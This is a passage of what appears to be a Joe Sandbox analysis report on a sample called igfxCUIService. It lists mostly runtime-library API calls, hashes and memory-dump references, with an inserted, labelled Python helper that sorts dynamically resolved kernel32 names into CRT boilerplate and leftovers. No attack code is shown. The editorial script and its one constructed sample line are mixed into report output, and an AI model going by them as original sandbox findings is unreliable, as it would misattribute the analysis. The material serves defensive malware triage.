                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4ef9a211567bd6a44e3aff3fe788fc3b70a48939546757e152cccebadd786a5
                                  • Instruction ID: dc1d47fe321c9c294b2774a6f6504829f7746144925d9706506d0aa6f7742a62
                                  • Opcode Fuzzy Hash: a4ef9a211567bd6a44e3aff3fe788fc3b70a48939546757e152cccebadd786a5
                                  • Instruction Fuzzy Hash: 84F028365017145BC7213A39CC09B9B3BA8CF92334F140B25FB65931D1CB74D81286F5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D4710F,00000001,00000364,00000006,000000FF,?,?,?,00D4185C,00D46950), ref: 00D468B7
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 01d6aa05c5ee59d2cb69bb97fd3bcca0df09fb56ad90f5f2173a43d4fb71549d
                                  • Instruction ID: a7484a8d90de4b0bebc0a5dbed6434f85c6f77efd6417b14b1d12c9fb3bde30d
                                  • Opcode Fuzzy Hash: 01d6aa05c5ee59d2cb69bb97fd3bcca0df09fb56ad90f5f2173a43d4fb71549d
                                  • Instruction Fuzzy Hash: 7CF0823160462567DF316B66EC09F6A7B48EF43760B1C4122FC0AE61D4CA70ED1596F2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D348E0,?,?,00D28B4A,?,?,00D11154), ref: 00D4693F
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 1bde82ae9e5cf839eca606e9d6e409c108fc2d114e9fb209a477ec7dfed1bc2d
                                  • Instruction ID: 6559e850523135d4520cd7255c664cdb7cb3dc5b698284210da61909b9c70424
                                  • Opcode Fuzzy Hash: 1bde82ae9e5cf839eca606e9d6e409c108fc2d114e9fb209a477ec7dfed1bc2d
                                  • Instruction Fuzzy Hash: 77E06D3120462167DA212A6A9C04B5A3A48DF43BB0F1D0520FC5AE61D8DBF0DC408AB3
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,00000000,?,00D54023,?,?,00000000,?,00D54023,00000000,0000000C), ref: 00D53CDE
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: d6b3dc222e73b55eca19ea42479767244f2a2dc2e6951a4f1852bf436a396f31
                                  • Instruction ID: 9679a0edfe8a20d8fca9f0e389a87de64e2bb2f7527a56a020e8da9bf526cc7d
                                  • Opcode Fuzzy Hash: d6b3dc222e73b55eca19ea42479767244f2a2dc2e6951a4f1852bf436a396f31
                                  • Instruction Fuzzy Hash: 59D06C3201020DBBDF028F88DC06EDA3FAAFB48715F014100BE1896160C732E861EB91
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RtlEncodePointer.NTDLL(?,?,00D3591B,00D35961,?,00D357A8,00000000,00000000,00000000,00000004,00D288A0,00000001,00000008,00000000,00000000,F0B87680), ref: 00D35E92
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID:
                                  • API String ID: 2118026453-0
                                  • Opcode ID: 199225d979ebcecb0c1e3711930e28f4270950c0a393b1c459aec8b1cc8b4564
                                  • Instruction ID: f2928a237bae6336b3929accaff57ec79ef6c43d27bf93056bbb17b8e39a7d7f
                                  • Opcode Fuzzy Hash: 199225d979ebcecb0c1e3711930e28f4270950c0a393b1c459aec8b1cc8b4564
                                  • Instruction Fuzzy Hash: D8D0C9B8048B049BEB04AF48FC4AB103BA5E306301F000029E94CC23B1D7F15494CA74
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Non-executed Functions

                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D360AE
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D360BC
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D360CD
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D360DE
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D360EF
                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D36100
                                  • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00D36111
                                  • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D36122
                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00D36133
                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D36144
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D36155
                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D36166
                                  • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D36177
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D36188
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D36199
                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D361AA
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D361BB
                                  • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00D361CC
                                  • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00D361DD
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00D361EE
                                  • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00D361FF
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00D36210
                                  • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00D36221
                                  • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00D36232
                                  • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00D36243
                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D36254
                                  • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D36265
                                  • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00D36276
                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D36287
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D36298
                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00D362A9
                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D362BA
                                  • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00D362CB
                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D362DC
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00D362ED
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00D362FE
                                  • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00D3630F
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00D36320
                                  • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00D36331
                                  • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00D36342
                                  • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00D36353
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                  • API String ID: 667068680-295688737
                                  • Opcode ID: 0f3e1c95d4aa65c9a6eadfed4bb6cd54edd6ec3acab9079c32985b479cf1bbaa
                                  • Instruction ID: 9a99932e41a9c1b63dac71ec07916618dc7037d78f7eabc1bb27d38f77246b8a
                                  • Opcode Fuzzy Hash: 0f3e1c95d4aa65c9a6eadfed4bb6cd54edd6ec3acab9079c32985b479cf1bbaa
                                  • Instruction Fuzzy Hash: DB613371962B20AFDB005FBCBC0D89A3EA8EA097573009627FD16D23A4D7F4444CAB75
                                  Uniqueness

                                  Uniqueness Score: 100.00%
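
                                   Added triage helper (editor's example, not code from the Joe Sandbox report or from the analysed sample). The 40 names this non-executed function hands to GetProcAddress, in this order, are the kernel32 function-pointer table that the statically linked Visual C++ 2013 CRT fills at start-up (winapisupp.c), which is why the "extensive use of GetProcAddress" signature fires on CRT boilerplate here; any import hiding by the sample itself needs evidence from other functions. The script parses API entries in the format used by this listing and reports which dynamically resolved names are CRT boilerplate and which still need an explanation. Its sample input copies the first five entries of this function, one "Part of subcall" entry shortened from the listing of the function at 00D4C6D1 and the _Ios_base_dtor entry from the listing above, plus one constructed line (VirtualAllocEx, ref DEADBEEF) that does not occur in the report.

```python
"""Triage helper for the API entries of a Joe Sandbox function listing.

Added example, not code from the report or from the analysed sample.  It
parses entries in the listing's own format, e.g.
    GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D360BC
and compares the names a function resolves dynamically with the kernel32
pointer table the Visual C++ 2013 CRT fills at start-up (winapisupp.c), so
that statically linked runtime code is not read as the sample's own
import hiding.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One entry; a "Part of subcall function X:" prefix is kept as `subcall`.
# The argument list is optional (LIBCPMT/LIBCMT entries carry none).
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[^\s(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API entry in `text`; bullets, indentation and other lines are skipped."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = API_LINE.match(raw.strip().lstrip("•").strip())
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["sub"]))
    return calls


# kernel32 names the VC++ 2013 CRT resolves at start-up; identical, and in the
# same order, to the 40 GetProcAddress entries of the function at 00D360AE.
MSVC2013_CRT_KERNEL32_THUNKS = frozenset("""
FlsAlloc FlsFree FlsGetValue FlsSetValue InitializeCriticalSectionEx
InitOnceExecuteOnce CreateEventExW CreateSemaphoreW CreateSemaphoreExW
CreateThreadpoolTimer SetThreadpoolTimer WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer CreateThreadpoolWait SetThreadpoolWait CloseThreadpoolWait
FlushProcessWriteBuffers FreeLibraryWhenCallbackReturns GetCurrentProcessorNumber
CreateSymbolicLinkW GetCurrentPackageId GetTickCount64
GetFileInformationByHandleEx SetFileInformationByHandle
GetSystemTimePreciseAsFileTime InitializeConditionVariable
WakeConditionVariable WakeAllConditionVariable SleepConditionVariableCS
InitializeSRWLock AcquireSRWLockExclusive TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive SleepConditionVariableSRW CreateThreadpoolWork
SubmitThreadpoolWork CloseThreadpoolWork CompareStringEx GetLocaleInfoEx
LCMapStringEx
""".split())


def resolved_names(calls: List[ApiCall]) -> List[str]:
    """Second argument of every GetProcAddress entry, in listing order."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2]


def classify_resolutions(calls: List[ApiCall],
                         known=MSVC2013_CRT_KERNEL32_THUNKS) -> dict:
    """Split resolved names into CRT boilerplate and names that still need an
    analyst's explanation; `crt_only` is True when nothing is left over."""
    names = resolved_names(calls)
    unexplained = [n for n in names if n not in known]
    return {
        "resolved": len(names),
        "crt_boilerplate": [n for n in names if n in known],
        "unexplained": unexplained,
        "crt_only": bool(names) and not unexplained,
    }


# Sample input: first five entries copied from the listing of the function at
# 00D360AE, one subcall entry shortened from the listing of the function at
# 00D4C6D1, one LIBCPMT entry from the listing; the last line is CONSTRUCTED
# (not in the report) to show how a non-CRT resolution is reported.
SAMPLE = """
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D360AE
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D360BC
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D360CD
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D360DE
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D360EF
  • Part of subcall function 00D46876: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00D468B7
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00D1AC7D
• GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: DEADBEEF
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref} {c.module}!{c.api} {c.args} via {c.subcall or '-'}")
    print(classify_resolutions(parsed))
```

Feed it the whole "APIs" block of one function at a time: a function whose resolutions are `crt_only` is runtime start-up code, while any name left in `unexplained` is what actually warrants the "hides API calls" reading.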

                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00D4EDC8,00000002,00000000,?,?,?,00D4EDC8,?,00000000), ref: 00D4EB43
                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00D4EDC8,00000002,00000000,?,?,?,00D4EDC8,?,00000000), ref: 00D4EB6C
                                  • GetACP.KERNEL32(?,?,00D4EDC8,?,00000000), ref: 00D4EB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: c18cdadd9f92abef2ed8af2cd7f15696739995d8be92448d6914b6b4b94f7f3a
                                  • Instruction ID: 89ff382282f6744db5469905f9e01c2d769aa10a15f6f8f3605c0469d0acb83e
                                  • Opcode Fuzzy Hash: c18cdadd9f92abef2ed8af2cd7f15696739995d8be92448d6914b6b4b94f7f3a
                                  • Instruction Fuzzy Hash: 1A21B022A00211FBDB348F59CD45AA7B3A6FF54B68B5E8524E94BD7210E732ED41C3B0
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                    • Part of subcall function 00D46F6D: GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                    • Part of subcall function 00D46F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                    • Part of subcall function 00D46F6D: _free.LIBCMT ref: 00D46FCF
                                    • Part of subcall function 00D46F6D: _free.LIBCMT ref: 00D47005
                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00D4ED8B
                                  • IsValidCodePage.KERNEL32(00000000), ref: 00D4EDD4
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00D4EDE3
                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D4EE2B
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D4EE4A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 949163717-0
                                  • Opcode ID: 5ec1c0e1fd73fd52a489ca051728abd56d63a753198d2f0fe486422caec35b3d
                                  • Instruction ID: f4be624ca3ffd75e2ae44c078aed0d8794558e6fa01650552d538351c67bbbd7
                                  • Opcode Fuzzy Hash: 5ec1c0e1fd73fd52a489ca051728abd56d63a753198d2f0fe486422caec35b3d
                                  • Instruction Fuzzy Hash: 13516D72E00215BFDB20EFA5CC41ABAB7B8FF08700F184529E915E7290EB709A44CB71
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  APIs
                                    • Part of subcall function 00D46F6D: GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                    • Part of subcall function 00D46F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                  • GetACP.KERNEL32(?,?,?,?,?,?,00D44253,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00D4E3DF
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00D44253,?,?,?,00000055,?,-00000050,?,?), ref: 00D4E40A
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00D4E56D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: a994cbe30b3da4ed09e72aca861505a9c3fdf024e5a4e590983090a0d7268ec3
                                  • Instruction ID: 42411b00dc7a747ae9aa32a2dcce24725917c627ba9de5e7ca2962ab0ffeb4f5
                                  • Opcode Fuzzy Hash: a994cbe30b3da4ed09e72aca861505a9c3fdf024e5a4e590983090a0d7268ec3
                                  • Instruction Fuzzy Hash: 9371C372A00306BBDB25AF75CC8ABAB73A8FF49704F184429F945DB181FB74E9408671
                                  Uniqueness

                                  Uniqueness Score: 6.12%

                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID:
                                   • String ID:
                                   • API String ID:
                                   • Opcode ID: 4c3b0b10dae3f9ee04aaeaf0cfa5d2f0f01c55839207f593d39e6bdc1a8d57bd
                                   • Instruction ID: e8fbe8e6f621f069d770dabe49de2456b31f982859047ee23f9ea6ff490e83de
                                   • Opcode Fuzzy Hash: 4c3b0b10dae3f9ee04aaeaf0cfa5d2f0f01c55839207f593d39e6bdc1a8d57bd
                                   • Instruction Fuzzy Hash: 0631C676900219AFCB24EFA9CC89DBBB7B9EB94320F544159F90597240EA70ED408B74
                                   Uniqueness
                                   • Uniqueness Score: 0.00%

                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free$Info
                                   • String ID:
                                   • API String ID: 2509303402-0
                                   • Opcode ID: 8e963f0cf4143bb3e372aff129965d48a965bffe649cc70b2830f44b7f21ff68
                                   • Instruction ID: d45951495d11b42767c841d0f2e254534e827c5d41a4e8e911421a494cdd1a41
                                   • Opcode Fuzzy Hash: 8e963f0cf4143bb3e372aff129965d48a965bffe649cc70b2830f44b7f21ff68
                                   • Instruction Fuzzy Hash: CFD1AB71E007059FDB21DFA8D881BAEBBF5FF09310F184169E895AB282D774A945CB70
                                   Uniqueness
                                   • Uniqueness Score: 0.67%

                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 00D4D949
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB22
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB34
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB46
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB58
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB6A
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB7C
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CB8E
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBA0
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBB2
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBC4
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBD6
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBE8
                                    • Part of subcall function 00D4CB05: _free.LIBCMT ref: 00D4CBFA
                                  • _free.LIBCMT ref: 00D4D93E
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4D960
                                  • _free.LIBCMT ref: 00D4D975
                                  • _free.LIBCMT ref: 00D4D980
                                  • _free.LIBCMT ref: 00D4D9A2
                                  • _free.LIBCMT ref: 00D4D9B5
                                  • _free.LIBCMT ref: 00D4D9C3
                                  • _free.LIBCMT ref: 00D4D9CE
                                  • _free.LIBCMT ref: 00D4DA06
                                  • _free.LIBCMT ref: 00D4DA0D
                                  • _free.LIBCMT ref: 00D4DA2A
                                  • _free.LIBCMT ref: 00D4DA42
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                   • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                   Yara matches
                                   Similarity
                                   • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                   • String ID:
                                   • API String ID: 161543041-0
                                   • Opcode ID: 59d7e2ed12a7b79e771956cd2fb1be106e0b73490395fa7c0e68fde91a3e2a5b
                                   • Instruction ID: 8b8f4ddf13ac47a9eada2b4a7702b25f9588bd0f8d1f7c54e6b4e255539962b6
                                   • Opcode Fuzzy Hash: 59d7e2ed12a7b79e771956cd2fb1be106e0b73490395fa7c0e68fde91a3e2a5b
                                   • Instruction Fuzzy Hash: 243190716043419FEB20AA79D846B5BB3EAEF02310F184529F09AD7191DF74ED40CB31
                                   Uniqueness
                                   • Uniqueness Score: 0.13%

                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                   • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                   • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
